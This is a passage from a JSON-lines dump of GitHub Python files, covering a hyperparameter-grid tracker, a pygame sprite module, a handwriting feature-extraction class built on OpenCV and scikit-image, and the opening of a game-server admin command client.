self.__params.drop_duplicates(inplace=True)\n self.__dirty = False\n \n def __check_pm_name(self, pm, target=None):\n if target is None:\n target = self.__params.columns\n \n if len(pm) != len(target):\n logging.warning(\"The parameter name length '%d %s' is not match to %d %s\" % (len(pm), pm, len(target), target))\n return False\n \n for name in pm:\n if name not in target:\n logging.warning(\"The parameter name '%s' is not allowed\" % name)\n return False\n return True\n \n def __assert_pm_name(self, pm, target=None):\n if not self.__check_pm_name(pm, target):\n raise Exception('Not matched param columns')\n \n def __cond(self, pm):\n for i, (p, v) in enumerate(pm.items()):\n if i == 0:\n cond = (self.__params[p] == v)\n else:\n cond &= (self.__params[p] == v)\n return cond\n \n def __dup_params(self, pm):\n pm = pm.copy()\n for p in self.__result_cols:\n pm.pop(p, None)\n\n self.__assert_pm_name(pm, [*self.__meta_cols, 
*self.__rec_cols]) #no result cols\n return self.__params[self.__cond(pm)]\n\n \n def is_dup(self, pm):\n return not self.__dup_params(pm).empty\n\n \n def add(self, pm, ifdup='update'):\n self.__assert_pm_name(pm)\n self.__params.loc[len(self.__params)] = pm\n self.__dirty = True\n\n def save(self):\n self.__check_dirty()\n os.makedirs(os.path.dirname(self.__fname), exist_ok=True)\n self.__params.to_csv(self.__fname)\n \n # put new item and return (new) dict\n @staticmethod\n def __put(d, k, v, inplace=False):\n if not inplace:\n d = d.copy()\n d[k] = v\n return d\n\n # return the list of pm generated form meta[idx:]\n # @pm is a dict of paramter/value\n @classmethod\n def __gen(cls, meta, idx):\n if idx >= len(meta):\n return [{}] # empty pm\n\n p, vals = meta[idx]\n\n # 'inplace' is not necessary, just for dict reuse\n return [ cls.__put(pm, p, v, inplace=(i==0)) \\\n for pm in cls.__gen(meta, idx + 1) \\\n for i, v in enumerate(vals) ]\n\n # @pm_rec: not 'score' and not 'meta'\n # return best score and its meta param\n def best_param(self, pm_temp):\n rec, _ = split_dict(pm_temp, self.__rec_cols)\n\n calidates = self.__params[self.__cond(rec)].iloc[:, self.__score_idx]\n if calidates.empty:\n return None, None\n best = dict(self.__params.iloc[calidates.idxmax()].items())\n \n meta, result, _ = split_dict(best, self.__meta_cols, self.__result_cols)\n\n #logging.info('best: %s, %s' % (meta, result))\n return meta, result\n \n # @pm_temp: parameter template: contain 'meta' (list) and 'rec' (normal), without 'score' column\n # flaten params and skim the duplicatd params, according to @pm_temp\n def gen_params(self, pm_temp, by='nodup'):\n \n # extract meta parameter from template\n meta, rec, _ = split_dict(pm_temp, self.__meta_cols, self.__rec_cols)\n \n def listify(pm):\n for p in meta:\n v = pm[p]\n pm[p] = [v]\n return pm\n \n metas = []\n for m in self.__gen(list(meta.items()), 0): \n if not self.is_dup({**m, **rec}):\n metas.append(listify(m))\n \n return metas\n\n '''\n # a trivial version of __gen(meta,0) is like below, if len(meta) is fixed to 4:\n p1, p2, p3, p4 = meta \n for v1 in pm_meta[p1]:\n for v2 in pm_meta[p2]:\n for v3 in pm_meta[p3]:\n for v4 in pm_meta[p4]:\n pm = {p1: v1, p2: v2, p3: v3, p4: v4}\n '''\n \nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO,\n format=\"%(asctime)s.%(msecs)03d [%(levelname)s] [%(module)s] %(message)s\", datefmt=\"%H:%M:%S\")\n\n\n pm_grid = {\n 'clf__C': [30.0],\n 'clf__penalty': ['l1'],\n 'vect__max_df': [0.5, 0.7],\n 'vect__ngram_range': [(1,1), (2,2), (3, 3), (4,4), (5,5), (99,99)],\n\t}\n\n convs = {p:eval for p, v in pm_grid.items() if isinstance(v[0], tuple)}\n\n logging.info(\"hyperparameters:\")\n cols = (sorted(pm_grid.keys()), ('task_name', 'data_size', 'cv_fold', 'cv_scoring'), ('score', 'std'))\n hyparams = HyperparamKeeper('.params-test', cols, convs)\n logging.info(hyparams.df)\n\n # add pseudo data ===================\n pm1 = {\n 'task_name': 'TOD',\n 'data_size': 14383,\n 'cv_fold': 2,\n 'cv_scoring': 'f1',\n 'clf__C': 30.0,\n 'clf__penalty': 'l1',\n 'vect__max_df': 0.5,\n 'vect__ngram_range': (1,1), \n 'score': 1.0,\n 'std': 0.0\n }\n\n pm2 = {**pm1, 'vect__ngram_range': (2,2), 'score': 2.0}\n pm3 = {**pm1, 'vect__ngram_range': (3,3), 'score': 3.0}\n\n hyparams.add(pm1)\n hyparams.add(pm2)\n\n # test is dup ==================================\n logging.info('')\n for pm in (pm1, pm2, pm3):\n del pm['score']\n logging.info(\"is params dup: %s %s\" % (hyparams.is_dup(pm), pm))\n\n # testing gen_params 
==================================\n pm_temp = { \n 'task_name': 'TOD',\n 'data_size': 14383,\n 'cv_fold': 2,\n 'cv_scoring': 'f1',\n 'clf__C': [30.0],\n 'clf__penalty': ['l1'],\n 'vect__max_df': [0.5],\n 'vect__ngram_range': [(1,1), (2,2), (3,3), (4,4)] \n }\n\n pms = [str(pm) for pm in hyparams.gen_params(pm_temp)]\n logging.info('')\n logging.info('\\n '.join([\"Generated params: \", *pms]))\n\n # testing best score ==================================\n best_pm, best_result = hyparams.best_param(pm_temp)\n logging.info('')\n logging.info(\"Best result: %s\" % best_result)\n logging.info(\"Best param: %s\" % best_pm)\n\n","repo_name":"jianwei76/SoliAudit","sub_path":"va/vul-predict/hyperparam.py","file_name":"hyperparam.py","file_ext":"py","file_size_in_byte":7275,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"7"} +{"seq_id":"9941004373","text":"import pygame\r\nimport sprite\r\n\r\nvec = pygame.math.Vector2\r\n\r\n\r\nclass Yukari(sprite.Sprite):\r\n def __init__(self, spawn_x, spawn_y):\r\n super().__init__(\"res/img/yukari.png\", spawn_x, spawn_y)\r\n self.pos = vec(self.rect.center)\r\n\r\n def update(self):\r\n self.rect.center = self.pos\r\n\r\n\r\nclass MagicCircle(sprite.Sprite):\r\n def __init__(self, spawn_x, spawn_y):\r\n super().__init__(\"res/img/magic_circle.png\", spawn_x, spawn_y)\r\n self.pos = vec(self.rect.center)\r\n self.frame = 0\r\n self.original_image = pygame.image.load(\"res/img/magic_circle.png\")\r\n self.image = self.original_image\r\n self.angle = 0\r\n self.fast = False\r\n\r\n def update(self):\r\n cx, cy = self.rect.center\r\n if self.fast:\r\n self.image = pygame.transform.rotate(self.original_image, self.angle)\r\n self.angle += -2 % -360\r\n else:\r\n self.image = pygame.transform.rotate(self.original_image, self.angle)\r\n self.angle += 1 % 360\r\n self.rect = self.image.get_rect()\r\n self.rect.center = (cx, cy)\r\n","repo_name":"vv52/destitute-dreamscape","sub_path":"yukari.py","file_name":"yukari.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"23721605421","text":"import numpy as np\n# import re\n# import os\nimport cv2\nimport pandas as pd\n# import plotly.express as px\n# import plotly.graph_objects as go\n# import matplotlib.pyplot as plt\nfrom skimage.measure import label, regionprops_table\nfrom skimage.morphology import dilation\n# from plotly.subplots import make_subplots\n# import plotly.io as pio\nfrom skimage.transform import warp\nfrom sklearn.mixture import GaussianMixture\nimport warnings\nfrom skimage.transform import hough_line, hough_line_peaks\nfrom skimage.transform import AffineTransform, warp\nfrom skimage.measure import shannon_entropy\n# pio.renderers.default = 'notebook'\n\nclass Image_fe:\n \n # reads image and applies median blur\n def __init__(self, img_name, path = r'C:/Users/jahna/Downloads/HQA/Crop/Crop', local = True, ruled = False):\n if local:\n self.path, self.img_name = path, img_name\n img = cv2.imread(f'{path}//{img_name}', 0)\n else:\n img, self.img_name = img_name, 'app image'\n if ruled:\n self.img = self.remove_rules(img)\n if not ruled:\n _, img = cv2.threshold(img, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)\n self.img = cv2.medianBlur(img, 5)\n else:\n _, img = cv2.threshold(img, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)\n self.img = cv2.medianBlur(img, 5)\n self.ruled = ruled\n \n # determins the positions in the image that corresponding to 
lines \n def preprocess(self):\n lines, img = self.tile_list(), self.img\n self.lines = lines\n self.label = self.label_words()\n if (np.unique(self.label).shape[0] <= len(lines) * 2) or self.ruled:\n self.label = self.label_cc()\n \n # ruled lines removal\n def remove_rules(self, img):\n gray, src_img = img.copy(), img.copy()\n _, binarized = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)\n _, binarized_inv = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)\n convert_r = lambda angle: np.pi * angle / 180\n convert_d = lambda angle: 180 * angle / np.pi\n width = binarized.shape[1] // 6\n select_block = lambda image, r, c: image[width*(r-1): width*r, width*(c-1): width*c]\n boxes_hough = []\n for i, j in [(3, 2), (3, 5), (5, 2), (5, 5)]:\n _, theta, distance = hough_line_peaks(\n *hough_line(select_block(binarized_inv, i, j)),\n threshold = (width * 2) // 3\n )\n boxes_hough.append(list(map(\n lambda y: (round(convert_d(y[0])) + ((y[0]<0)*180), y[1] * (y[0]//abs(y[0]))),\n zip(theta, distance)\n )))\n line_angles = [j[0] for i in map(lambda box: box[:2], boxes_hough) for j in i]\n if not all(boxes_hough):\n self.ruled = False\n return img\n votes = {angle: sum(map(lambda y: angle-3 <= y <= angle+3, line_angles)) for angle in set(line_angles)}\n for angle in line_angles:\n votes[angle] += 1\n line_angle = max(votes, key = lambda y: votes[y])\n matrix = np.eye(3)\n matrix[1][0] = convert_r(line_angle-90)\n hline_img = warp(\n src_img,\n matrix,\n mode = 'wrap',\n preserve_range = True\n )\n hline_img = np.uint8(hline_img)\n\n box_distances = []\n for box in boxes_hough:\n hlines = sorted([distance for angle, distance in box if line_angle-3 <= angle <= line_angle+3])\n distances = [hlines[idx+1] - hlines[idx] for idx in range(len(hlines)-1)]\n box_distances.append(np.mean(distances))\n dist = np.mean(box_distances, dtype = 'int')\n\n# gray = cv2.cvtColor(hline_img, cv2.COLOR_RGB2GRAY)\n _, binarized = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)\n _, binarized_inv = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)\n\n _, theta, distance = hough_line_peaks(*hough_line(select_block(binarized_inv, 1, 2)), threshold = (width * 2) // 3)\n upper_box = list(map(lambda y: (round(convert_d(y[0])) + ((y[0]<0)*180), y[1] * (y[0]//abs(y[0]))), (zip(theta, distance))))\n first_line = int(sorted(filter(lambda y: 87 <= y[0] <= 93, upper_box), key = lambda y: y[1])[0][1])\n\n test_subject, width = binarized_inv.copy(), gray.shape[1] // 6\n vline_strips = range(first_line - dist // 2, test_subject.shape[0] - dist, dist)\n for vstrip_idx in vline_strips:\n for hstrip_idx in range(0, 6*width, width):\n test_strip = test_subject[vstrip_idx: vstrip_idx+dist, hstrip_idx: hstrip_idx + width]\n hough, strip_theta, strip_dist = hough_line(test_strip)\n thresh, line_theta, line_dist = hough_line_peaks(hough, strip_theta, strip_dist, threshold = test_strip.shape[1] * (3/4), num_peaks = 1)\n if line_dist.shape[0] == 0:\n continue\n line_dist, line_theta, r, theta = (hough.shape[0] // 2) + int(line_dist[0]), round(convert_d(line_theta[0])) + 90, line_dist, line_theta\n cos, sin, w = np.cos(theta), np.sin(theta), test_strip.shape[1]\n thickness = (hough[line_dist-5:line_dist+5, line_theta] > (test_strip.shape[1] / 2)).sum()\n cv2.line(test_strip, (0, int(r/sin)), (w, int((r-(w*cos)) / sin)), 0, thickness)\n if shannon_entropy(test_strip) < 0.15:\n test_strip *= 0\n test_strip = cv2.dilate(cv2.medianBlur(test_strip, ksize = 3), kernel = 
np.ones((10, 1)))\n test_subject[vstrip_idx: vstrip_idx+dist, hstrip_idx: hstrip_idx + width] = test_strip\n return test_subject\n \n # performs line segementation \n def tile_list(self):\n hp = (self.img == 255).sum(axis = 1)\n arr = pd.Series(hp).rolling(30, min_periods = 1).sum().to_numpy()\n minima, switch = [[]], arr < arr.mean()\n for i in range(1, len(arr)):\n if switch[i] != switch[i-1]:\n if switch[i]:\n minima.append([i])\n else:\n minima[-1].append(i)\n minimum = [np.argmin(hp[:minima[0][0]])]\n for i in minima[1:-1]:\n minimum.append(np.argmin(hp[i[0]:i[1]]) + i[0])\n minimum.append(minima[-1][0] + np.argmin(hp[minima[-1][0]:]))\n return ([0] if minimum[0] != 0 else []) + minimum + ([self.img.shape[0]] if minimum[-1] != self.img.shape[0] else [])\n \n # word segmentation v2\n def label_words(self):\n lines, gaps, words_segmented, used, flag, img = self.lines, [], np.empty(shape = (0, self.img.shape[1]), dtype = 'int'), 0, False, self.img.copy()\n def label_new(img):\n if img.sum():\n dilated, line = img.copy(), img\n if line.sum():\n line_vp, gaps, count = np.trim_zeros(line.sum(axis= 0)), [], 0\n for i in line_vp:\n if not i:\n count += 1\n elif count:\n gaps.append(count)\n count = 0\n gaps = np.array(gaps)\n kernel = np.ones(shape = (50, 2))\n dilated = dilation(dilated, kernel)\n\n limg = (img == 255).astype('uint8')\n reg = pd.DataFrame(\n regionprops_table(label(dilated), properties = ('label', 'bbox', 'image', 'area'))\n ).set_index('label')\n c = 1\n for i, minr, minc, maxr, maxc, mask, area in reg.itertuples():\n limg[minr: maxr, minc: maxc][mask] *= c\n c += 1\n return limg\n else:\n return img\n\n warnings.filterwarnings('ignore')\n for line_no in range(len(lines)-1):\n line = label_new(img[lines[line_no]: lines[line_no+1]]).astype('int')\n line[line > 0] += used\n words_segmented, used = np.vstack((words_segmented, line)), line.max()\n max_index = img[lines[line_no]: lines[line_no+1]].sum(axis = 1).argmax()\n df = pd.DataFrame(regionprops_table(line, properties = ['label', 'centroid', 'bbox']))\n df.set_index('label', inplace = True)\n df.sort_values(by = 'centroid-1', inplace = True)\n for i in range(df.shape[0]-1):\n x, y = df.iloc[i].name, df.iloc[i+1].name\n t, b = max(df.loc[x, 'bbox-0'], df.loc[y, 'bbox-0']), min(df.loc[x, 'bbox-2'], df.loc[y, 'bbox-2'])\n left_x, left_y, right_x, right_y = df.loc[x, 'bbox-1'], df.loc[y, 'bbox-1'], df.loc[x, 'bbox-3'], df.loc[y, 'bbox-3']\n x_line, y_line = line == x, line == y\n words_mask = (x_line[t:b].sum(axis = 1) & y_line[t:b].sum(axis = 1)) != 0\n if (left_x < left_y < right_y < right_x) or (left_y < left_x < right_x < right_y):\n gaps.append((-1, x, y, 0))\n elif (t >= b) or ((words_mask != 0).sum() == 0):\n gaps.append((left_y - right_x, x, y, 0))\n else:\n target = np.argmin([np.argmax(y_line[i]) + np.argmax(x_line[i][::-1]) for i in np.arange(t, b)[words_mask]])\n left, right = 2400-np.argmax(x_line[t:b][words_mask][target][::-1]), np.argmax(y_line[t:b][words_mask][target])\n gaps.append((right - left, x, y, 0))\n else:\n gaps.append((0, 0, 0, 0))\n gaps, n = np.array(gaps, dtype = 'int'), 1\n gap_mask = (gaps[:, 0] > 0)\n gm = GaussianMixture(n_components = 2, random_state = 0)\n gm = gm.fit(np.vstack((gaps[:, :n][gap_mask], np.zeros((10, n)))))\n if (~gap_mask).sum():\n return self.label_cc()\n \n gap_predictions = gm.predict(gaps[:, :n][gap_mask])\n gap_label = np.argmin([gaps[gap_mask][gap_predictions == i][:, 0].mean() for i in range(2)])\n gaps[:, -1][gap_mask] = gap_predictions\n gaps[:, -1][~gap_mask] = 
gap_label\n\n\n prev = gaps[0, 2]\n for d, x, y, p in gaps:\n if d:\n prev = prev if prev else x\n if p == gap_label:\n words_segmented[words_segmented == y] = prev\n else:\n prev = y\n else:\n prev = 0\n iterations = 0\n while (gap_label in gap_predictions) and gap_mask.sum():\n img, gaps = words_segmented.copy(), []\n for line_no in range(len(lines)-1):\n line = img[lines[line_no]: lines[line_no+1]]\n df = pd.DataFrame(regionprops_table(line, properties = ['label', 'centroid', 'bbox']))\n df.set_index('label', inplace = True)\n df.sort_values(by = 'bbox-1', inplace = True)\n for i in range(df.shape[0]-1):\n x, y = df.iloc[i].name, df.iloc[i+1].name\n t, b = max(df.loc[x, 'bbox-0'], df.loc[y, 'bbox-0']), min(df.loc[x, 'bbox-2'], df.loc[y, 'bbox-2'])\n left_x, left_y, right_x, right_y = df.loc[x, 'bbox-1'], df.loc[y, 'bbox-1'], df.loc[x, 'bbox-3'], df.loc[y, 'bbox-3']\n x_line, y_line = line == x, line == y\n words_mask = (x_line[t:b].sum(axis = 1) & y_line[t:b].sum(axis = 1)) != 0\n if (left_x < left_y < right_y < right_x) or (left_y < left_x < right_x < right_y):\n gaps.append((-1, x, y, 0))\n elif (t >= b) or ((words_mask != 0).sum() == 0):\n gaps.append((left_y - right_x, x, y, 0))\n else:\n target = np.argmin([np.argmax(y_line[i]) + np.argmax(x_line[i][::-1]) for i in np.arange(t, b)[words_mask]])\n left, right = 2400-np.argmax(x_line[t:b][words_mask][target][::-1]), np.argmax(y_line[t:b][words_mask][target])\n gaps.append((right - left, x, y, 0))\n else:\n gaps.append((0, 0, 0, 0))\n gaps = np.array(gaps, dtype = 'int')\n gap_mask = (gaps[:, 0] > 0)\n if gap_mask.sum():\n gap_predictions = gm.predict(gaps[:, :n][gap_mask])\n gaps[:, -1][gap_mask] = gap_predictions\n elif (~gap_mask).sum():\n gaps[:, -1][~gap_mask] = gap_label\n prev = gaps[0, 2]\n for d, x, y, p in gaps:\n if d:\n prev = prev if prev else x\n if p == gap_label:\n words_segmented[words_segmented == y] = prev\n else:\n prev = y\n else:\n prev = 0\n iterations += 1\n if iterations == 10:\n break\n return words_segmented\n\n # word segmentation v1\n def label_cc(self):\n lines, dilated, img = self.lines, self.img.copy(), self.img\n for line_no in range(len(lines)-1):\n line = img[lines[line_no]: lines[line_no+1]]\n if line.sum():\n line_vp, gaps, count = np.trim_zeros(line.sum(axis= 0)), [], 0\n for i in line_vp:\n if not i:\n count += 1\n elif count:\n gaps.append(count)\n count = 0\n gaps = np.array(gaps)\n kernel_size = int(np.ceil(np.append([10], gaps[(gaps < 60) & (gaps > 5)]).mean())) # '&' keeps only gaps strictly between 5 and 60 px; '+' (elementwise OR) matched every gap\n kernel = np.ones(shape = (1, kernel_size))\n dilated[lines[line_no]: lines[line_no+1]] = dilation(dilated[lines[line_no]: lines[line_no+1]], kernel)\n \n limg = (img == 255).astype('uint8')\n reg = pd.DataFrame(\n regionprops_table(label(dilated), properties = ('label', 'bbox', 'image', 'area'))\n ).set_index('label')\n c = 1\n for i, minr, minc, maxr, maxc, mask, area in reg.itertuples():\n limg[minr: maxr, minc: maxc][mask] *= c\n c += 1\n return limg\n \n def outlier(self, arr):\n# print(arr.shape)\n p15 = np.quantile(arr, 0.15)\n return arr[arr >= p15]\n \n def entropy_bin(self, data, bin_width, round_off = False):\n if data.shape[0] == 0:\n return np.nan\n if round_off:\n cut = pd.cut(\n data,\n bins = np.arange(data.min() - bin_width, data.max(), bin_width)\n )\n else:\n cut = pd.cut(\n data,\n bins = np.arange(round(data.min()) - bin_width, round(data.max()), bin_width)\n )\n n = cut.shape[0]\n counts = cut.value_counts()\n return counts.apply(lambda v: -v * np.log2(v/n) / n).sum()\n\n # determines space between words and 
stores it in an array\n def space_fe(self):\n img, lines, label, space_list, space_img = self.img, self.lines, self.label, [], self.img.copy()\n for line_no in range(len(lines)-1):\n line, iline = label[lines[line_no]: lines[line_no+1]], img[lines[line_no]: lines[line_no+1]]\n max_index = iline.sum(axis = 1).argmax()\n df = pd.DataFrame(regionprops_table(line, properties = ['label', 'centroid', 'bbox']))\n df.set_index('label', inplace = True)\n df.sort_values(by = 'centroid-1', inplace = True)\n df = df[df['bbox-0'] < max_index]\n df = df[max_index < df['bbox-2']]\n for i in range(df.shape[0]-1):\n x, y = df.iloc[i].name, df.iloc[i+1].name\n t, b = max(df.loc[x, 'bbox-0'], df.loc[y, 'bbox-0']), min(df.loc[x, 'bbox-2'], df.loc[y, 'bbox-2'])\n x_line, y_line = line == x, line == y\n target = np.argmin([np.argmax(y_line[i]) + np.argmax(x_line[i][::-1]) for i in range(t, b)]) + t\n left, right = line.shape[1]-np.argmax(x_line[target][::-1]), np.argmax(y_line[target])\n space_list.append(right - left)\n # cv2.arrowedLine(iline, (left, target), (right, target), color = 200, thickness = 2)\n # cv2.arrowedLine(iline, (right, target), (left, target), color = 200, thickness = 2)\n # self.space_img = img\n space_list = self.outlier(np.array(space_list))\n series = pd.Series(\n data = [space_list.mean(), space_list.std(), self.entropy_bin(space_list, 10)],\n index = ['space_mean', 'space_std', 'space_entropy'],\n name = self.img_name\n )\n return series\n \n # space centroid \n def space1_fe(self):\n img, lines, label, space_list = self.img, self.lines, self.label, []\n for line_no in range(len(lines)-1):\n line, iline = label[lines[line_no]: lines[line_no+1]], img[lines[line_no]: lines[line_no+1]]\n max_index = iline.sum(axis = 1).argmax()\n df = pd.DataFrame(regionprops_table(line, properties = ['label', 'centroid', 'bbox']))\n df.set_index('label', inplace = True)\n df.sort_values(by = 'centroid-1', inplace = True)\n for i in range(df.shape[0]-1):\n x, y = df.iloc[i]['centroid-1'], df.iloc[i+1]['centroid-1']\n x_width , y_width = (df.iloc[i]['bbox-3'] - df.iloc[i]['bbox-1']) , (df.iloc[i+1]['bbox-3'] - df.iloc[i+1]['bbox-1'])\n centroid_dist = y - x - (x_width + y_width) / 2 \n space_list.append(centroid_dist)\n space_list = self.outlier(np.array(space_list))\n space_list = space_list[space_list >= 0]\n series = pd.Series(\n data = [space_list.std() , space_list.mean(), self.entropy_bin(space_list, 10)],\n index = ['space1_std', 'space1_mean', 'space1_entropy'],\n name = self.img_name\n )\n return series \n \n # determines space between words and stores it in an array (modified)\n def space2_fe(self):\n img, lines, label, space_list, space_img = self.img, self.lines, self.label, [], self.img.copy()\n for line_no in range(len(lines)-1):\n line, iline = label[lines[line_no]: lines[line_no+1]], img[lines[line_no]: lines[line_no+1]]\n max_index = iline.sum(axis = 1).argmax()\n df = pd.DataFrame(regionprops_table(line, properties = ['label', 'centroid', 'bbox']))\n df.set_index('label', inplace = True)\n df.sort_values(by = 'centroid-1', inplace = True)\n df = df[df['bbox-0'] < max_index]\n df = df[max_index < df['bbox-2']]\n for i in range(df.shape[0]-1):\n x, y = df.iloc[i].name, df.iloc[i+1].name\n t, b = max(df.loc[x, 'bbox-0'], df.loc[y, 'bbox-0']), min(df.loc[x, 'bbox-2'], df.loc[y, 'bbox-2'])\n x_line, y_line = line == x, line == y\n words_mask = (x_line[t:b].sum(axis = 1) & y_line[t:b].sum(axis = 1)) != 0\n # left, right = line.shape[1]-np.argmax(x_line[target][::-1]), 
np.argmax(y_line[target])\n if (t >= b) or ((words_mask != 0).sum() == 0):\n continue\n target = np.argmin([np.argmax(y_line[i]) + np.argmax(x_line[i][::-1]) for i in np.arange(t, b)[words_mask]])\n left, right = 2400-np.argmax(x_line[t:b][words_mask][target][::-1]), np.argmax(y_line[t:b][words_mask][target])\n space_list.append(right - left)\n cv2.arrowedLine(iline, (left, target), (right, target), color = 200, thickness = 2)\n cv2.arrowedLine(iline, (right, target), (left, target), color = 200, thickness = 2)\n self.space_img = img\n space_list = self.outlier(np.array(space_list))\n series = pd.Series(\n data = [space_list.mean(), space_list.std(), self.entropy_bin(space_list, 10)],\n index = ['space2_mean', 'space2_std', 'space2_entropy'],\n name = self.img_name\n )\n return series\n \n def slant_fe(self, ret = False):\n # extracts the slant for each word \n def slant(word):\n hp, vp, scores = word.sum(axis = 1), word.sum(axis = 0), []\n f, b = np.argmax(hp>0), word.shape[0] - np.argmax(hp[::-1]>0)\n l, r = np.argmax(vp>0), word.shape[1] - np.argmax(vp[::-1]>0)\n word = word[f:b+1, l:r+1]\n matrix, scores, w = np.eye(3), [], word.shape[0]\n for i in np.linspace(-1, 1, 91):\n matrix[0][1] = i\n word_sheared = warp(word, matrix, mode='wrap')\n trim, vp = [w - np.argmax(col) - np.argmax(col[::-1]) for col in word_sheared.T], word_sheared.sum(axis = 0)\n scores.append((vp[trim == vp]**2).sum())\n return 45 + np.argmax(scores)\n\n temp = regionprops_table(self.label, properties = ['label', 'area'], extra_properties=[slant])\n slants, weights = temp['slant'], temp['area']\n self.slant_img = self.color(slants, temp['label'])\n slants = self.outlier(slants[weights > np.quantile(weights, 0.25)])\n series = pd.Series(\n data = [slants.mean(), slants.std(), self.entropy_bin(slants, 4)],\n index = ['slant_mean', 'slant_std', 'slant_entropy'],\n name = self.img_name\n )\n return temp['slant'] if ret else series\n\n # height feature extractor\n def height_fe(self, ret = False):\n def height(word):\n li = np.apply_along_axis(lambda col: word.shape[0] - np.argmax(col) if col.sum() else 0, 0, word)\n return li.mean() + li.std()\n temp = regionprops_table(self.label, properties = ['area'], extra_properties = [height])\n heights, weights = temp['height'], temp['area']\n heights = self.outlier(heights[weights > np.quantile(weights, 0.25)])\n series = pd.Series(\n data = [heights.mean(), heights.std(), self.entropy_bin(heights, 10)],\n index = ['height_mean', 'height_std', 'height_entropy'],\n name = self.img_name\n )\n return temp['height'] if ret else series\n \n # height1 feature extractor\n def height1_fe(self, ret = False):\n temp = regionprops_table(self.label, properties = ['bbox', 'area'])\n heights, weights = temp['bbox-2'] - temp['bbox-0'], temp['area']\n # self.height_img = self.color(heights)\n heights = self.outlier(heights[weights > np.quantile(weights, 0.25)])\n series = pd.Series(\n data = [heights.mean(), heights.std(), self.entropy_bin(heights, 10)],\n index = ['height1_mean', 'height1_std', 'height1_entropy'],\n name = self.img_name\n )\n return temp['bbox-2'] - temp['bbox-0'] if ret else series\n \n def height2_fe(self, ret = False):\n lines = pd.Series(self.lines)\n lines = (lines - lines.shift()).iloc[:-1].dropna()\n series = pd.Series(\n data = [lines.mean(), lines.std(), self.entropy_bin(lines, 10)],\n index = ['height2_mean', 'height2_std', 'height2_entropy'],\n name = self.img_name\n )\n return lines if ret else series\n \n # improved height function\n def height3_fe(self, ret = 
False):\n def height(img):\n hp = np.sum(img, axis=1)\n max_pos = np.argmax(hp)\n threshold = hp[max_pos]/3\n b, e = max_pos, max_pos\n while (hp[b] > threshold and b != 0) or (hp[e]> threshold and e != len(hp)-1):\n if hp[b] > threshold and (b > 0):\n b -= 1\n if hp[e] > threshold and (e < len(hp)-1):\n e+=1\n return e-b\n temp = regionprops_table(self.label, properties = ['label', 'area'], extra_properties = [height])\n heights, weights = temp['height'], temp['area']\n self.height_img = self.color(heights, temp['label'])\n heights = heights[weights > np.quantile(weights, 0.1)]\n series = pd.Series(\n data = [heights.mean(), heights.std(), self.entropy_bin(heights, 10)],\n index = ['height3_mean', 'height3_std', 'height3_entropy'],\n name = self.img_name\n )\n return heights if ret else series\n\n \n\n # Area \n def area_fe(self, ret = False):\n temp = regionprops_table(self.label, properties = ['area', 'bbox', 'label'])\n heights = temp['area'] / (temp['bbox-3'] - temp['bbox-1'])\n self.area_img = self.color(heights, temp['label'])\n weights, h = temp['area'], heights\n heights = self.outlier(heights[weights > np.quantile(weights, 0.25)])\n series = pd.Series(\n data = [heights.mean(), heights.std(), self.entropy_bin(heights, 2, round_off = True)],\n index = ['area_mean', 'area_std', 'area_entropy'],\n name = self.img_name\n )\n return h if ret else series\n \n # Solidity \n def solidity_fe(self, ret = False):\n temp = regionprops_table(self.label, properties = ['area', 'solidity'])\n weights, heights = temp['area'], temp['solidity']\n heights = self.outlier(heights[weights > np.quantile(weights, 0.25)])\n series = pd.Series(\n data = [heights.mean(), heights.std(), self.entropy_bin(heights, 0.1, round_off = True)],\n index = ['solidity_mean', 'solidity_std', 'solidity_entropy'],\n name = self.img_name\n )\n return heights if ret else series\n \n # Extent \n def extent_fe(self, ret = False):\n temp = regionprops_table(self.label, properties = ['area', 'extent'])\n weights, heights = temp['area'], temp['extent']\n heights = self.outlier(heights[weights > np.quantile(weights, 0.25)])\n series = pd.Series(\n data = [heights.mean(), heights.std(), self.entropy_bin(heights, 0.1, round_off = True)],\n index = ['extent_mean', 'extent_std', 'extent_entropy'],\n name = self.img_name\n )\n return heights if ret else series\n\n def word_fe(self):\n self.preprocess()\n return pd.concat(\n (\n self.slant_fe(),\n # self.space_fe(),\n self.space1_fe(),\n self.space2_fe(),\n self.height_fe(),\n self.height1_fe(),\n # self.height2_fe(),\n self.height3_fe(),\n self.area_fe(),\n self.extent_fe(),\n self.solidity_fe()\n )\n )\n \n def color(self, li, labels):\n img = self.label.astype(float).copy()\n for i, j in zip(labels, li):\n img[img == i] *= j / i\n return img\n \n","repo_name":"adityad1/hwa","sub_path":"hwa1.py","file_name":"hwa1.py","file_ext":"py","file_size_in_byte":26756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"24603105070","text":"#coding=utf-8\nimport requests\n\nclass MHCP001:\n cmds=[\n ('game',['start','stop','pause']),\n ('ban',['ip','name','clear']),\n ('player',['kill','heal']),\n ('set',['count','word','pos']),\n ('su',['on','off']),\n ]\n\n def __init__(self,dialog,servervar,resultvar,evalvar,evaltext):\n self.dialog=dialog\n self.s=requests.Session()\n self.s.trust_env=False\n self.servervar=servervar\n self.resultvar=resultvar\n self.evalvar=evalvar\n self.evaltext=evaltext\n\n def init_auth(self,un,pw):\n 
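# requests.Session keeps these credentials and applies HTTP Basic Auth to every request it later sends\n        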
